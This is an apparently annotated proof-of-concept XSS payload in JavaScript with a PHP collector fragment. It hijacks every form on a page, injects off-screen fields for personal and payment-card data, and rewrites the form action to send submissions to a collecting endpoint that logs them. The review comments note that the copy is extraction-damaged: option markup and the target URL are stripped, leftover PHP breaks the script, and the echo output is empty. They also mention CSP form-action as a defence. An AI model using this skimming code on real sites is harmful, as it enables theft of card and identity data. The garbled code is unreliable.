/**
 * Form-hijacking proof-of-concept payload (XSS post-exploitation demo).
 *
 * For every <form> on the page it:
 *   1. collects the names of the form's existing input/select/textarea/button
 *      controls;
 *   2. for a fixed list of PII and payment-card field names that the form does
 *      not already have, appends an extra control wrapped in a <div> pushed
 *      off-screen (left:-500px; position:absolute) — invisible to the user, but
 *      still a member of the form and therefore still submitted;
 *   3. records the original field names ('origFieldList') and the original
 *      action ('origActionUrl') in hidden inputs;
 *   4. overwrites form.action so the whole submission (original fields plus the
 *      injected ones) goes to a collecting endpoint instead of the real one.
 *
 * NOTE(review): the injected controls are created empty; presumably the payload
 * relies on browser autofill populating fields named name/email/cc_number/...
 * before submit — nothing in this code fills them. Confirm against the write-up.
 *
 * NOTE(review): this copy is extraction-damaged. The three `innerHTML = ''`
 * assignments lost their <option> markup, the fragment `$i';\n"; } ?>` under the
 * 'cc_year' case is residue of a server-side (PHP) loop that generated those
 * options, and the target in `form.action = ''` appears stripped as well. As
 * printed the function does not parse; do not run it as-is.
 *
 * Defensive notes: a Content-Security-Policy `form-action` directive restricts
 * where a form may submit and blocks a rewritten action that points elsewhere;
 * monitoring form.action changes and off-screen controls appended to forms is a
 * usable detection signal. Run only against targets you are authorized to test.
 *
 * Side effects: mutates every form in the document. forms, fields, aFieldList,
 * d and f are assigned without var/let/const and become implicit globals.
 */
function xssFormJacker(){
// Get all forms on page
forms = document.querySelectorAll('form');
Array.prototype.forEach.call( forms, form => {
fields = form.querySelectorAll('input,select,textarea,button')
// Get list of fields
aFieldList = Array();
Array.prototype.forEach.call( fields, field => {
// field.name is '' for an unnamed control, so the list may carry empty entries
aFieldList.push( field.name );
});
// Add extra hidden fields
// text fields
'name,email,phone,organization,address,postal,city,county,state,cc_number,cc_cvv'.split(',').forEach(function(name){
// never shadow a field the form already has — the real one would be submitted anyway
if( aFieldList.includes( name ) ){
return;
}
d = document.createElement('div')
// positioned off-screen rather than display:none; either way the control is still submitted
d.style = 'left: -500px; position: absolute;'
f = document.createElement('input');
f.type='text';
f.name = name;
d.appendChild( f );
form.appendChild( d );
});
// Select boxes
'country,cc_month,cc_year'.split(',').forEach(function(name){
if( aFieldList.includes( name ) ){
return;
}
d = document.createElement('div')
d.style = 'left: -500px; position: absolute;'
f = document.createElement('select');
f.name = name;
switch( name ){
case 'country':
// option markup missing in this copy (stripped by extraction)
f.innerHTML = '';
break;
case 'cc_month':
// option markup missing in this copy (stripped by extraction)
f.innerHTML = '';
break;
case 'cc_year':
// the next three lines are leftover PHP template text, not JavaScript
$i';\n";
}
?>
break;
}
d.appendChild( f );
form.appendChild( d );
});
// Remember the original fields
f = document.createElement('input')
f.type = 'hidden';
f.name = 'origFieldList';
// comma-joined, so a field name containing ',' would be ambiguous on the receiving side
f.value = aFieldList.join(',');
form.appendChild( f );
// Change the action URL
f = document.createElement('input')
f.type = 'hidden';
f.name = 'origActionUrl';
// the real target is carried along so the collector can replay the submission
f.value = form.action;
form.appendChild( f );
// collecting endpoint — empty in this copy; the PHP handler at the bottom of the
// file reads origActionUrl from the request, consistent with posting there
form.action = '';
});
}
// Fire once the page has loaded so every form is already in the DOM.
// Plain assignment replaces any window.onload handler the page set earlier.
window.onload = xssFormJacker;
prepare($sql);
$stmt->execute($data);
}else{
file_put_contents( $log_file, print_r( $data, true ), FILE_APPEND );
}
// Build the form
// Replay path: when the hijacked submission carried the original action, emit a
// page that re-posts the captured fields to it; otherwise bounce to google.com.
// NOTE(review): the echo bodies below are empty in this copy (markup stripped by
// extraction). $_REQUEST merges GET, POST and cookie input, so origActionUrl is
// attacker-/user-controlled: if it is interpolated into the emitted markup it
// must be escaped with htmlspecialchars() and presumably should be checked to be
// an http(s) URL before use as a form target — confirm against the original.
if( !empty( $_REQUEST['origActionUrl'] ) ){
echo "
";
echo "\n";
echo "\n";
echo "";
}else{
// no redirect target supplied: send the visitor somewhere innocuous
header( 'Location: https://www.google.com' );
}
}
?>